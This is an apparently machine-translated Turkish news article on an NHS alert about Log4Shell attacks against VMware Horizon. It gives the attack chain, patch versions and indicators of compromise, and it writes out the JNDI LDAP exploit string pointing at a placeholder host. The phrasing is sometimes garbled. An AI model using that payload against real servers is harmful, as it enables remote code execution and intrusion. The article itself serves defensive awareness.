İngiltere Ulusal Sağlık Servisi (NHS), Log4Shell açıklarından yararlanan VMware Horizon dağıtımlarını hedefleyen bilinmeyen bir tehdit grubuna ilişkin bir siber uyarı uyarısı yayınladı.
Log4Shell bir istismardır CVE-2021-44228, etkin durumda olan Apache Log4j 2.14’te kritik bir rastgele uzaktan kod yürütme hatası ve yüksek hacimli sömürü Aralık 2021’den beri.
Apache, sonraki güvenlik güncellemeleri aracılığıyla yukarıdaki ve dört güvenlik açığını daha giderdi ve Log4j sürüm 2.17.1 artık yeterince güvenli kabul ediliyor.
VMware Horizon’da Apache Tomcat’i Hedefleme
NHS bildirimine göre, aktör, kamu altyapısındaki savunmasız VMware Horizon dağıtımlarında uzaktan kod yürütmeyi sağlamak için bu istismardan yararlanıyor.
“Saldırı büyük olasılıkla, saldırganın kötü amaçlı altyapıyı geri çağırmak için Log4Shell yükleri aracılığıyla Java Adlandırma ve Dizin ArabirimiTM (JNDI) kullandığı bir keşif aşamasından oluşuyor.” uyarıyı açıklar.
“Bir zayıflık tespit edildiğinde, saldırı, VM Blast Secure Gateway hizmetine bir web kabuğu enjekte eden kötü amaçlı bir Java sınıfı dosyasını almak ve yürütmek için Hafif Dizin Erişim Protokolü’nü (LDAP) kullanır.”
“Web kabuğu daha sonra bir saldırgan tarafından ek kötü amaçlı yazılım dağıtma, veri hırsızlığı veya fidye yazılımı dağıtma gibi bir dizi kötü amaçlı etkinlik gerçekleştirmek için kullanılabilir.”
Oyuncu, Log4Shell’e karşı savunmasız olan VMware Horizon’a gömülü Apache Tomcat hizmetinin varlığından yararlanıyor.
Sömürü, basit ve yaygın olarak kullanılan “${jndi:ldap://example.com}” yüküyle başlar ve Tomcat’ten aşağıdaki PowerShell komutunu üretir.
Bu komut, ‘VMBlastSG’ hizmet adlarının bir listesini almak, yolları almak, bir dinleyici bırakmak için ‘absg-worker.js’yi değiştirmek ve ardından implantı etkinleştirmek için hizmeti yeniden başlatmak için bir win32 hizmetini çağırır.
Dinleyici daha sonra HTTP/HTTPS aracılığıyla alınan isteğe bağlı komutları sabit kodlanmış bir dize ile başlık nesneleri olarak yürütmekten sorumludur.
Bu noktada, aktör C2 sunucusuyla kalıcı ve istikrarlı bir iletişim kurmuştur ve veri sızdırma, komut yürütme veya fidye yazılımı dağıtabilir.
VMware Horizon, Log4j güvenlik açığını kullanan tehdit aktörleri tarafından hedeflenen tek VMware ürünü değil.
bu Conti fidye yazılımı işlemi de Log4Shell kullanıyor sanal makineleri daha kolay şifrelemek için savunmasız VMware vCenter sunucularına yanal olarak yayılmak.
Güvenlik güncellemeleri mevcut
VMware yayınlandı güvenlik güncellemesi Horizon ve diğer ürünler için geçen ay, 2111, 7.13.1 ve 7.10.3 sürümleriyle CVE-2021-44228 ve CVE-2021-45046 düzeltildi
Bu nedenle, tüm VMware Horizon yöneticilerinin güvenlik güncellemelerini mümkün olan en kısa sürede uygulamaları istenmektedir.
NHS’nin raporu ayrıca, savunmasız sistemlerde aşağıdaki üç aktif istismar belirtisinin altını çiziyor:
- ws_TomcatService.exe’nin anormal süreçler ürettiğinin kanıtı
- Komut satırında ‘VMBlastSG’ içeren herhangi bir powershell.exe işlemi
- ‘…VMwareVMware ViewServerappblastgatewaylibabsg-worker.js’ dosyası değişiklikleri – Yükseltmeler sırasında genellikle bu dosyanın üzerine yazılır ve değiştirilmez